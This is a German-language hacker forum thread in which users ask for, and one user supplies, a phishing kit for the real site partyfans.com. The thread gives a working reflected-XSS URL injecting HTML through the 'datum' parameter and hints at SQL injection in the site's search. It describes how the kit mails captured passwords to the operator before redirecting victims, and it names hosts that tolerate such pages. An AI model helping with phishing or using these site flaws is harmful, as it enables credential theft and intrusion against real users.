Hi,
ich habe jetzt schon 2 phishing vtuts durchgearbeitet leider erfolglos.
Bei anderen Seiten klappts ganz gut, aber bei partyfans.com komm ich immer ins stocken...
Könnte mir evtl jemand phishingseite für partyfans.com machen, wenn derjenige dann noch lust hat kann er mir ja die Tücke bei dieser Seite näher bringen.

soweit von mir
mfg

Mit ein paar HTML Kenntnissen & Anfängerwissen in PHP solltest du das auch alleins hinbekommen :)
Also lieber dafür Tutorials suchen anstatt für Phishing-Seiten... ;)

Da ich selbst auf dieser Seite gereggt bin & vor ca 2 Jahren auch schonmal nach Lücken gesucht habe, kann ich dir verraten, dass es mal eine XSS Lücke in der Suchfunktion gab - Leider seit ein paar Monaten gefixxt... =/ bin mir aber sicher, dass man - wenn man sich ein bisschen umschaut sicherlich noch mehr findet, da die Seite komplett selbst Programmiert wurde... und wie wir alle wissen - keiner ist fehlerfrei :)
[mit soetwas hätte man meiner Meinung nach mehr Erfolg als mit Phishing...]

Von so einer Lücke hab ich schon gehört, leider habe ich von sowas nur minimal Ahnung :(

Ich bräuchtee auch eine Partyfans.com pishing Seite,
Kann einer machen pls?

Sind doch immer noch XSS Lücken ;) Beispielsweise im GET-Parameter datum hier:


http://www.partyfans.com/index.php?dest=3400&datum=2009-05"><h1>Wer mir Sql-i beibringen möchte ... ICQ: 482226845</h1>&Submit=anzeigen

Ich bräuchtee auch eine Partyfans.com pishing Seite,
Kann einer machen pls?


Hi,
ich habe jetzt schon 2 phishing vtuts durchgearbeitet leider erfolglos.
Bei anderen Seiten klappts ganz gut, aber bei partyfans.com komm ich immer ins stocken...
Könnte mir evtl jemand phishingseite für partyfans.com machen, wenn derjenige dann noch lust hat kann er mir ja die Tücke bei dieser Seite näher bringen.

soweit von mir
mfg

Wenn ich am WE ein bisschen Zeit finde mach ich mal eine.. ;)


@Trick0r:
Jep... ist auch nicht die Einzigste die man dort noch findet^^
Man muss alleins in der suche mal --> eingeben und bekommt schon 'ne Order by angezeigt.. :) (die man aber leider nicht injecten kann, bzw. habe mich noch nicht allzuarg damit auseinander gesetzt..)



PS. wie kommt es dass sich so viele von Partyfans hier rumtreiben und solche anfragen stellen... :shock:

:) kA

Wie versprochen, hier mal das Phishing-Script:
http://uploaded.to/?id=a2coqi

Anmerkung:
- Euer Webspace auf den ihr es ladet muss PHP unterstützen und Mails versenden können.
- In die userLogin.php die Mailadresse eintragen, an welche das PWD geschickt werden soll.


--
Kurze Beschreibung:
1: User besucht Eure Seite & gibt Daten ein.
2: Die Daten werden an Eure Mailadresse geschickt.
3: Der User wird auf die original Partyfansseite umgeleitet und bekommt eine Nachricht, dass er das falsche Passwort eingegeben hat.

super vielen dank!

edit: mein webspace wird andauernd gesperrt welchen empfehlt ihr? mit php+mail senden

ohost.de

extra.hu

Könntest du´s villeicht nochmal hochladen? Wär echt toll. Der link funtzt nämlich nett ;-)

Link ist Down bitte nen Reupp will mir das mal anschauen. Danke